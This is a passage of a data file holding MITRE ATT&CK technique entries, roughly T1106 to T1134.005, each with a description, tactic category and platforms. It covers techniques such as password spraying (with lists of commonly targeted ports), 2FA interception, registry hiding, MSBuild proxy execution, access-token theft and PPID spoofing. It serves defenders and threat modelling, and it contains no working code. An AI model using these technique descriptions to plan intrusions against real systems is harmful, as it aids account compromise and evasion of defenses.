                          'Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also '
                          'available to interact with native APIs. These frameworks typically provide language '
                          'wrappers/abstractions to API functionalities and are designed for ease-of-use/portability '
                          'of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS '
                          'Cocoa)(Citation: macOS Foundation)\n'
                          '\n'
                          'Adversaries may abuse these native API functions as a means of executing behaviors. Similar '
                          'to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the '
                          'native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize '
                          'various components of a victimized system.',
           'name': 'Native API',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1108': {'attack_id': 'T1108',
           'categories': ['defense-evasion', 'persistence'],
           'description': '**This technique has been deprecated. Please use [Create '
                          'Account](https://attack.mitre.org/techniques/T1136), [Web '
                          'Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote '
                          'Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n'
                          '\n'
                          'Adversaries may use more than one remote access tool with varying command and control '
                          'protocols or credentialed access to remote services so they can maintain access if an '
                          'access mechanism is detected or mitigated. \n'
                          '\n'
                          'If one type of tool is detected and blocked or removed as a response but the organization '
                          "did not gain a full understanding of the adversary's tools and access, then the adversary "
                          'will be able to retain access to the network. Adversaries may also attempt to gain access '
                          'to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote '
                          'Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to '
                          'maintain access despite interruptions to remote access tools deployed within a target '
                          'network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based '
                          'infrastructure and applications.\n'
                          '\n'
                          'Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain '
                          'access to a network through an externally accessible Web server.',
           'name': 'Redundant Access',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'Office 365', 'SaaS', 'Azure AD']},
 'T1110': {'attack_id': 'T1110',
           'categories': ['credential-access'],
           'description': 'Adversaries may use brute force techniques to gain access to accounts when passwords are '
                          'unknown or when password hashes are obtained. Without knowledge of the password for an '
                          'account or set of accounts, an adversary may systematically guess the password using a '
                          'repetitive or iterative mechanism. Brute forcing passwords can take place via interaction '
                          'with a service that will check the validity of those credentials or offline against '
                          'previously acquired credential data, such as password hashes.',
           'name': 'Brute Force',
           'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'Azure AD', 'SaaS', 'GCP', 'AWS', 'Azure']},
 'T1110.001': {'attack_id': 'T1110.001',
               'categories': ['credential-access'],
               'description': 'Adversaries with no prior knowledge of legitimate credentials within the system or '
                              'environment may guess passwords to attempt access to accounts. Without knowledge of the '
                              'password for an account, an adversary may opt to systematically guess the password '
                              'using a repetitive or iterative mechanism. An adversary may guess login credentials '
                              'without prior knowledge of system or environment passwords during an operation by using '
                              'a list of common passwords. Password guessing may or may not take into account the '
                              "target's policies on password complexity or use policies that may lock accounts out "
                              'after a number of failed attempts.\n'
                              '\n'
                              'Guessing passwords can be a risky option because it could cause numerous authentication '
                              "failures and account lockouts, depending on the organization's login failure policies. "
                              '(Citation: Cylance Cleaver)\n'
                              '\n'
                              'Typically, management services over commonly used ports are used when guessing '
                              'passwords. Commonly targeted services include the following:\n'
                              '\n'
                              '* SSH (22/TCP)\n'
                              '* Telnet (23/TCP)\n'
                              '* FTP (21/TCP)\n'
                              '* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n'
                              '* LDAP (389/TCP)\n'
                              '* Kerberos (88/TCP)\n'
                              '* RDP / Terminal Services (3389/TCP)\n'
                              '* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n'
                              '* MSSQL (1433/TCP)\n'
                              '* Oracle (1521/TCP)\n'
                              '* MySQL (3306/TCP)\n'
                              '* VNC (5900/TCP)\n'
                              '\n'
                              'In addition to management services, adversaries may "target single sign-on (SSO) and '
                              'cloud-based applications utilizing federated authentication protocols," as well as '
                              'externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A '
                              '2018)\n'
                              '\n'
                              'In default environments, LDAP and Kerberos connection attempts are less likely to '
                              'trigger events over SMB, which creates Windows "logon failure" event ID 4625.',
               'name': 'Password Guessing',
               'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'GCP', 'Azure AD', 'AWS', 'Azure', 'SaaS']},
 'T1110.002': {'attack_id': 'T1110.002',
               'categories': ['credential-access'],
               'description': 'Adversaries may use password cracking to attempt to recover usable credentials, such as '
                              'plaintext passwords, when credential material such as password hashes are obtained. [OS '
                              'Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain '
                              'password hashes, this may only get an adversary so far when [Pass the '
                              'Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to '
                              'systematically guess the passwords used to compute hashes are available, or the '
                              'adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is '
                              'usually done on adversary-controlled systems outside of the target network.(Citation: '
                              'Wikipedia Password cracking) The resulting plaintext password resulting from a '
                              'successfully cracked hash may be used to log into systems, resources, and services in '
                              'which the account has access.',
               'name': 'Password Cracking',
               'platforms': ['Linux', 'macOS', 'Windows', 'Office 365', 'Azure AD']},
 'T1110.003': {'attack_id': 'T1110.003',
               'categories': ['credential-access'],
               'description': 'Adversaries may use a single or small list of commonly used passwords against many '
                              'different accounts to attempt to acquire valid account credentials. Password spraying '
                              "uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that "
                              'may match the complexity policy of the domain. Logins are attempted with that password '
                              'against many different accounts on a network to avoid account lockouts that would '
                              'normally occur when brute forcing a single account with many passwords. (Citation: '
                              'BlackHillsInfosec Password Spraying)\n'
                              '\n'
                              'Typically, management services over commonly used ports are used when password '
                              'spraying. Commonly targeted services include the following:\n'
                              '\n'
                              '* SSH (22/TCP)\n'
                              '* Telnet (23/TCP)\n'
                              '* FTP (21/TCP)\n'
                              '* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n'
                              '* LDAP (389/TCP)\n'
                              '* Kerberos (88/TCP)\n'
                              '* RDP / Terminal Services (3389/TCP)\n'
                              '* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n'
                              '* MSSQL (1433/TCP)\n'
                              '* Oracle (1521/TCP)\n'
                              '* MySQL (3306/TCP)\n'
                              '* VNC (5900/TCP)\n'
                              '\n'
                              'In addition to management services, adversaries may "target single sign-on (SSO) and '
                              'cloud-based applications utilizing federated authentication protocols," as well as '
                              'externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A '
                              '2018)\n'
                              '\n'
                              'In default environments, LDAP and Kerberos connection attempts are less likely to '
                              'trigger events over SMB, which creates Windows "logon failure" event ID 4625.',
               'name': 'Password Spraying',
               'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD', 'SaaS']},
 'T1110.004': {'attack_id': 'T1110.004',
               'categories': ['credential-access'],
               'description': 'Adversaries may use credentials obtained from breach dumps of unrelated accounts to '
                              'gain access to target accounts through credential overlap. Occasionally, large numbers '
                              'of username and password pairs are dumped online when a website or service is '
                              'compromised and the user account credentials accessed. The information may be useful to '
                              'an adversary attempting to compromise accounts by taking advantage of the tendency for '
                              'users to use the same passwords across personal and business accounts.\n'
                              '\n'
                              'Credential stuffing is a risky option because it could cause numerous authentication '
                              "failures and account lockouts, depending on the organization's login failure policies.\n"
                              '\n'
                              'Typically, management services over commonly used ports are used when stuffing '
                              'credentials. Commonly targeted services include the following:\n'
                              '\n'
                              '* SSH (22/TCP)\n'
                              '* Telnet (23/TCP)\n'
                              '* FTP (21/TCP)\n'
                              '* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n'
                              '* LDAP (389/TCP)\n'
                              '* Kerberos (88/TCP)\n'
                              '* RDP / Terminal Services (3389/TCP)\n'
                              '* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n'
                              '* MSSQL (1433/TCP)\n'
                              '* Oracle (1521/TCP)\n'
                              '* MySQL (3306/TCP)\n'
                              '* VNC (5900/TCP)\n'
                              '\n'
                              'In addition to management services, adversaries may "target single sign-on (SSO) and '
                              'cloud-based applications utilizing federated authentication protocols," as well as '
                              'externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A '
                              '2018)',
               'name': 'Credential Stuffing',
               'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD', 'SaaS']},
 'T1111': {'attack_id': 'T1111',
           'categories': ['credential-access'],
           'description': 'Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain '
                          'access to credentials that can be used to access systems, services, and network resources. '
                          'Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher '
                          'level of security than user names and passwords alone, but organizations should be aware of '
                          'techniques that could be used to intercept and bypass these security mechanisms. \n'
                          '\n'
                          'If a smart card is used for two-factor authentication, then a keylogger will need to be '
                          'used to obtain the password associated with a smart card during normal use. With both an '
                          'inserted card and access to the smart card password, an adversary can connect to a network '
                          'resource using the infected system to proxy the authentication with the inserted hardware '
                          'token. (Citation: Mandiant M Trends 2011)\n'
                          '\n'
                          'Adversaries may also employ a keylogger to similarly target other hardware tokens, such as '
                          "RSA SecurID. Capturing token input (including a user's personal identification code) may "
                          'provide temporary access (i.e. replay the one-time passcode until the next value rollover) '
                          'as well as possibly enabling adversaries to reliably predict future authentication values '
                          '(given access to both the algorithm and any seed values used to generate appended temporary '
                          'codes). (Citation: GCN RSA June 2011)\n'
                          '\n'
                          'Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is '
                          'common for one-time codes to be sent via out-of-band communications (email, SMS). If the '
                          'device and/or service is not secured, then it may be vulnerable to interception. Although '
                          'primarily focused on by cyber criminals, these authentication mechanisms have been targeted '
                          'by advanced actors. (Citation: Operation Emmental)',
           'name': 'Two-Factor Authentication Interception',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1112': {'attack_id': 'T1112',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may interact with the Windows Registry to hide configuration information within '
                          'Registry keys, remove information as part of cleaning up, or as part of other techniques to '
                          'aid in persistence and execution.\n'
                          '\n'
                          'Access to specific areas of the Registry depends on account permissions, some requiring '
                          'administrator-level access. The built-in Windows command-line utility '
                          '[Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry '
                          'modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote '
                          'access tool, which may contain functionality to interact with the Registry through the '
                          'Windows API.\n'
                          '\n'
                          'Registry modifications may also include actions to hide keys, such as prepending key names '
                          'with a null character, which will cause an error and/or be ignored when read via '
                          '[Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. '
                          '(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to '
                          'conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG '
                          '2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n'
                          '\n'
                          'The Registry of a remote system may be modified to aid in execution of files as part of '
                          'lateral movement. It requires the remote Registry service to be running on the target '
                          'system. (Citation: Microsoft Remote) Often [Valid '
                          'Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the '
                          "remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) "
                          'for RPC communication.',
           'name': 'Modify Registry',
           'platforms': ['Windows']},
 'T1113': {'attack_id': 'T1113',
           'categories': ['collection'],
           'description': 'Adversaries may attempt to take screen captures of the desktop to gather information over '
                          'the course of an operation. Screen capturing functionality may be included as a feature of '
                          'a remote access tool used in post-compromise operations. Taking a screenshot is also '
                          'typically possible through native utilities or API calls, such as '
                          '<code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: '
                          'CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n',
           'name': 'Screen Capture',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1114': {'attack_id': 'T1114',
           'categories': ['collection'],
           'description': 'Adversaries may target user email to collect sensitive information. Emails may contain '
                          'sensitive data, including trade secrets or personal information, that can prove valuable to '
                          'adversaries. Adversaries can collect or forward email from mail servers or clients. ',
           'name': 'Email Collection',
           'platforms': ['Windows', 'Office 365']},
 'T1114.001': {'attack_id': 'T1114.001',
               'categories': ['collection'],
               'description': 'Adversaries may target user email on local systems to collect sensitive information. '
                              'Files containing email data can be acquired from a user’s local system, such as Outlook '
                              'storage or cache files.\n'
                              '\n'
                              'Outlook stores data locally in offline data files with an extension of .ost. Outlook '
                              '2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook '
                              'support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and '
                              'earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas '
                              'IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data '
                              'files are typically stored in `C:\\Users\\<username>\\Documents\\Outlook Files` or '
                              '`C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Outlook`.(Citation: Microsoft '
                              'Outlook Files)',
               'name': 'Local Email Collection',
               'platforms': ['Windows']},
 'T1114.002': {'attack_id': 'T1114.002',
               'categories': ['collection'],
               'description': 'Adversaries may target an Exchange server or Office 365 to collect sensitive '
                              "information. Adversaries may leverage a user's credentials and interact directly with "
                              'the Exchange server to acquire information from within a network. Adversaries may also '
                              'access externally facing Exchange services or Office 365 to access email using '
                              'credentials or access tokens. Tools such as '
                              '[MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches '
                              'for specific keywords.',
               'name': 'Remote Email Collection',
               'platforms': ['Office 365', 'Windows']},
 'T1114.003': {'attack_id': 'T1114.003',
               'categories': ['collection'],
               'description': 'Adversaries may setup email forwarding rules to collect sensitive information. '
                              'Adversaries may abuse email-forwarding rules to monitor the activities of a victim, '
                              'steal information, and further gain intelligence on the victim or the victim’s '
                              'organization to use as part of further exploits or operations.(Citation: US-CERT '
                              'TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for '
                              'various email functions, including forwarding to a different recipient. Messages can be '
                              'forwarded to internal or external recipients, and there are no restrictions limiting '
                              'the extent of this rule. Administrators may also create forwarding rules for user '
                              'accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael '
                              'Exchange Mail Forwarding 2) \n'
                              '\n'
                              'Any user or administrator within the organization (or adversary with valid credentials) '
                              'can create rules to automatically forward all received messages to another recipient, '
                              'forward emails to different locations based on the sender, and more.',
               'name': 'Email Forwarding Rule',
               'platforms': ['Office 365', 'Windows']},
 'T1115': {'attack_id': 'T1115',
           'categories': ['collection'],
           'description': 'Adversaries may collect data stored in the clipboard from users copying information within '
                          'or between applications. \n'
                          '\n'
                          'In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN '
                          'Clipboard) OSX provides a native command, <code>pbpaste</code>, to grab clipboard '
                          'contents.(Citation: Operating with EmPyre)',
           'name': 'Clipboard Data',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1119': {'attack_id': 'T1119',
           'categories': ['collection'],
           'description': 'Once established within a system or network, an adversary may use automated techniques for '
                          'collecting internal data. Methods for performing this technique could include use of a '
                          '[Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search '
                          'for and copy information fitting set criteria such as file type, location, or name at '
                          'specific time intervals. This functionality could also be built into remote access tools. \n'
                          '\n'
                          'This technique may incorporate use of other techniques such as [File and Directory '
                          'Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool '
                          'Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.',
           'name': 'Automated Collection',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1120': {'attack_id': 'T1120',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to gather information about attached peripheral devices and '
                          'components connected to a computer system. Peripheral devices could include auxiliary '
                          'resources that support a variety of functionalities such as keyboards, printers, cameras, '
                          'smart card readers, or removable storage. The information may be used to enhance their '
                          'awareness of the system and network environment or may be used for further actions.',
           'name': 'Peripheral Device Discovery',
           'platforms': ['Windows', 'macOS']},
 'T1123': {'attack_id': 'T1123',
           'categories': ['collection'],
           'description': "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) "
                          'or applications (e.g., voice and video call services) to capture audio recordings for the '
                          'purpose of listening into sensitive conversations to gather information.\n'
                          '\n'
                          'Malware or scripts may be used to interact with the devices through an available API '
                          'provided by the operating system or an application to capture audio. Audio files may be '
                          'written to disk and exfiltrated later.',
           'name': 'Audio Capture',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1124': {'attack_id': 'T1124',
           'categories': ['discovery'],
           'description': 'An adversary may gather the system time and/or time zone from a local or remote system. The '
                          'system time is set and stored by the Windows Time Service within a domain to maintain time '
                          'synchronization between systems and services in an enterprise network. (Citation: MSDN '
                          'System Time) (Citation: Technet Windows Time Service)\n'
                          '\n'
                          'System time information may be gathered in a number of ways, such as with '
                          '[Net](https://attack.mitre.org/software/S0039) on Windows by performing <code>net time '
                          "\\\\hostname</code> to gather the system time on a remote system. The victim's time zone "
                          'may also be inferred from the current system time or gathered by using <code>w32tm '
                          '/tz</code>. (Citation: Technet Windows Time Service) The information could be useful for '
                          'performing other techniques, such as executing a file with a [Scheduled '
                          "Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), "
                          'or to discover locality information based on time zone to assist in victim targeting.',
           'name': 'System Time Discovery',
           'platforms': ['Windows']},
 'T1125': {'attack_id': 'T1125',
           'categories': ['collection'],
           'description': "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or "
                          'webcams) or applications (e.g., video call services) to capture video recordings for the '
                          'purpose of gathering information. Images may also be captured from devices or applications, '
                          'potentially in specified intervals, in lieu of video files.\n'
                          '\n'
                          'Malware or scripts may be used to interact with the devices through an available API '
                          'provided by the operating system or an application to capture video or images. Video or '
                          'image files may be written to disk and exfiltrated later. This technique differs from '
                          '[Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices '
                          "or applications for video recording rather than capturing the victim's screen.\n"
                          '\n'
                          "In macOS, there are a few different malware samples that record the user's webcam such as "
                          'FruitFly and Proton. (Citation: objective-see 2017 review)',
           'name': 'Video Capture',
           'platforms': ['Windows', 'macOS']},
 'T1127': {'attack_id': 'T1127',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may take advantage of trusted developer utilities to proxy execution of '
                          'malicious payloads. There are many utilities used for software development related tasks '
                          'that can be used to execute code in various forms to assist in development, debugging, and '
                          'reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI '
                          'Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may '
                          'often be signed with legitimate certificates that allow them to execute on a system and '
                          'proxy execution of malicious code through a trusted process that effectively bypasses '
                          'application control solutions.',
           'name': 'Trusted Developer Utilities Proxy Execution',
           'platforms': ['Windows']},
 'T1127.001': {'attack_id': 'T1127.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use MSBuild to proxy execution of code through a trusted Windows '
                              'utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by '
                              'Visual Studio. It handles XML formatted project files that define requirements for '
                              'loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n'
                              '\n'
                              'Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task '
                              'capability of MSBuild that was introduced in .NET version 4 allows for C# code to be '
                              'inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and '
                              'execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used '
                              'this way it can execute arbitrary code and bypass application control defenses that are '
                              'configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)',
               'name': 'MSBuild',
               'platforms': ['Windows']},
 'T1129': {'attack_id': 'T1129',
           'categories': ['execution'],
           'description': 'Adversaries may abuse shared modules to execute malicious payloads. The Windows module '
                          'loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal '
                          'Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part '
                          'of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from '
                          'functions like <code>CreateProcess</code>, <code>LoadLibrary</code>, etc. of the Win32 API. '
                          '(Citation: Wikipedia Windows Library Files)\n'
                          '\n'
                          'The module loader can load DLLs:\n'
                          '\n'
                          '* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT '
                          'directory;\n'
                          '    \n'
                          '* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) '
                          'pathname (but without extension);\n'
                          '    \n'
                          '* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative '
                          'pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded '
                          'EXPORTs;\n'
                          '    \n'
                          '* via <code>&#x3c;file name="filename.extension" loadFrom="fully-qualified or relative '
                          'pathname"&#x3e;</code> in an embedded or external "application manifest". The file name '
                          'refers to an entry in the IMPORT directory or a forwarded EXPORT.\n'
                          '\n'
                          'Adversaries may use this functionality as a way to execute arbitrary code on a victim '
                          'system. For example, malware may execute share modules to load additional components or '
                          'features.',
           'name': 'Shared Modules',
           'platforms': ['Windows']},
 'T1132': {'attack_id': 'T1132',
           'categories': ['command-and-control'],
           'description': 'Adversaries may encode data to make the content of command and control traffic more '
                          'difficult to detect. Command and control (C2) information can be encoded using a standard '
                          'data encoding system. Use of data encoding may adhere to existing protocol specifications '
                          'and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character '
                          'encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia '
                          'Character Encoding) Some data encoding systems may also result in data compression, such as '
                          'gzip.',
           'name': 'Data Encoding',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1132.001': {'attack_id': 'T1132.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may encode data with a standard data encoding system to make the content of '
                              'command and control traffic more difficult to detect. Command and control (C2) '
                              'information can be encoded using a standard data encoding system that adheres to '
                              'existing protocol specifications. Common data encoding schemes include ASCII, Unicode, '
                              'hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding) (Citation: '
                              'Wikipedia Character Encoding) Some data encoding systems may also result in data '
                              'compression, such as gzip.',
               'name': 'Standard Encoding',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1132.002': {'attack_id': 'T1132.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may encode data with a non-standard data encoding system to make the '
                              'content of command and control traffic more difficult to detect. Command and control '
                              '(C2) information can be encoded using a non-standard data encoding system that diverges '
                              'from existing protocol specifications. Non-standard data encoding schemes may be based '
                              'on or related to standard data encoding schemes, such as a modified Base64 encoding for '
                              'the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) '
                              '(Citation: Wikipedia Character Encoding) ',
               'name': 'Non-Standard Encoding',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1133': {'attack_id': 'T1133',
           'categories': ['persistence', 'initial-access'],
           'description': 'Adversaries may leverage external-facing remote services to initially access and/or persist '
                          'within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow '
                          'users to connect to internal enterprise network resources from external locations. There '
                          'are often remote service gateways that manage connections and credential authentication for '
                          'these services. Services such as [Windows Remote '
                          'Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally.\n'
                          '\n'
                          'Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is '
                          'often a requirement, which could be obtained through credential pharming or by obtaining '
                          'the credentials from users after compromising the enterprise network.(Citation: Volexity '
                          'Virtual Private Keylogging) Access to remote services may be used as a redundant or '
                          'persistent access mechanism during an operation.',
           'name': 'External Remote Services',
           'platforms': ['Windows', 'Linux']},
 'T1134': {'attack_id': 'T1134',
           'categories': ['defense-evasion', 'privilege-escalation'],
           'description': 'Adversaries may modify access tokens to operate under a different user or system security '
                          'context to perform actions and bypass access controls. Windows uses access tokens to '
                          'determine the ownership of a running process. A user can manipulate access tokens to make a '
                          'running process appear as though it is the child of a different process or belongs to '
                          'someone other than the user that started the process. When this occurs, the process also '
                          'takes on the security context associated with the new token.\n'
                          '\n'
                          'An adversary can use built-in Windows API functions to copy access tokens from existing '
                          'processes; this is known as token stealing. These token can then be applied to an existing '
                          'process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) '
                          'or used to spawn a new process (i.e. [Create Process with '
                          'Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a '
                          'privileged user context (i.e. administrator) to steal a token. However, adversaries '
                          'commonly use token stealing to elevate their security context from the administrator level '
                          'to the SYSTEM level. An adversary can then use a token to authenticate to a remote system '
                          'as the account for that token if the account has appropriate permissions on the remote '
                          'system.(Citation: Pentestlab Token Manipulation)\n'
                          '\n'
                          'Any standard user can use the <code>runas</code> command, and the Windows API functions, to '
                          'create impersonation tokens; it does not require access to an administrator account. There '
                          'are also other mechanisms, such as Active Directory fields, that can be used to modify '
                          'access tokens.',
           'name': 'Access Token Manipulation',
           'platforms': ['Windows']},
 'T1134.001': {'attack_id': 'T1134.001',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': "Adversaries may duplicate then impersonate another user's token to escalate privileges "
                              'and bypass access controls. An adversary can create a new access token that duplicates '
                              'an existing token using <code>DuplicateToken(Ex)</code>. The token can then be used '
                              'with <code>ImpersonateLoggedOnUser</code> to allow the calling thread to impersonate a '
                              "logged on user's security context, or with <code>SetThreadToken</code> to assign the "
                              'impersonated token to a thread.\n'
                              '\n'
                              'An adversary may do this when they have a specific, existing process they want to '
                              'assign the new token to. For example, this may be useful for when the target user has a '
                              'non-network logon session on the system.',
               'name': 'Token Impersonation/Theft',
               'platforms': ['Windows']},
 'T1134.002': {'attack_id': 'T1134.002',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may create a new process with a duplicated token to escalate privileges and '
                              'bypass access controls. An adversary can duplicate a desired access token with '
                              '<code>DuplicateToken(Ex)</code> and use it with <code>CreateProcessWithTokenW</code> to '
                              'create a new process running under the security context of the impersonated user. This '
                              'is useful for creating a new process under the security context of a different user.',
               'name': 'Create Process with Token',
               'platforms': ['Windows']},
 'T1134.003': {'attack_id': 'T1134.003',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may make and impersonate tokens to escalate privileges and bypass access '
                              'controls. If an adversary has a username and password but the user is not logged onto '
                              'the system, the adversary can then create a logon session for the user using the '
                              "<code>LogonUser</code> function. The function will return a copy of the new session's "
                              'access token and the adversary can use <code>SetThreadToken</code> to assign the token '
                              'to a thread.',
               'name': 'Make and Impersonate Token',
               'platforms': ['Windows']},
 'T1134.004': {'attack_id': 'T1134.004',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may spoof the parent process identifier (PPID) of a new process to evade '
                              'process-monitoring defenses or to elevate privileges. New processes are typically '
                              'spawned directly from their parent, or calling, process unless explicitly specified. '
                              'One way of explicitly assigning the PPID of a new process is via the '
                              '<code>CreateProcess</code> API call, which supports a parameter that defines the PPID '
                              'to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by '
                              'Windows features such as User Account Control (UAC) to correctly set the PPID after a '
                              'requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> '
                              'or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft '
                              'UAC Nov 2018)\n'
                              '\n'
                              'Adversaries may abuse these mechanisms to evade defenses, such as those blocking '
                              'processes spawning directly from Office documents, and analysis targeting '
                              'unusual/potentially malicious parent-child process relationships, such as spoofing the '
                              'PPID of '
                              '[PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) '
                              'to be <code>explorer.exe</code> rather than an Office document delivered as part of '
                              '[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: '
                              'CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual '
                              'Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office '
                              'document or any code that can perform [Native '
                              'API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar '
                              '2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n'
                              '\n'
                              'Explicitly assigning the PPID may also enable elevated privileges given appropriate '
                              'access rights to the parent process. For example, an adversary in a privileged user '
                              'context (i.e. administrator) may spawn a new process and assign the parent as a process '
                              'running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be '
                              'elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)',
               'name': 'Parent PID Spoofing',
               'platforms': ['Windows']},
 'T1134.005': {'attack_id': 'T1134.005',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may use SID-History Injection to escalate privileges and bypass access '
                              'controls. The Windows security identifier (SID) is a unique value that identifies a '
                              'user or group account. SIDs are used by Windows security in both security descriptors '
                              'and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the '
                              'SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), '
                              'allowing inter-operable account migration between domains (e.g., all values in '
                              'SID-History are included in access tokens).\n'
                              '\n'
                              'With Domain Administrator (or equivalent) rights, harvested or well-known SID values '
                              '(Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to '
                              'enable impersonation of arbitrary users/groups such as Enterprise Administrators. This '
                              'manipulation may result in elevated access to local resources and/or access to '
                              'otherwise inaccessible domains via lateral movement techniques such as [Remote '
                              'Services](https://attack.mitre.org/techniques/T1021), [Windows Admin '
                              'Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote '
                              'Management](https://attack.mitre.org/techniques/T1028).',
               'name': 'SID-History Injection',
               'platforms': ['Windows']},
 'T1135': {'attack_id': 'T1135',
           'categories': ['discovery'],
           'description': 'Adversaries may look for folders and drives shared on remote systems as a means of '
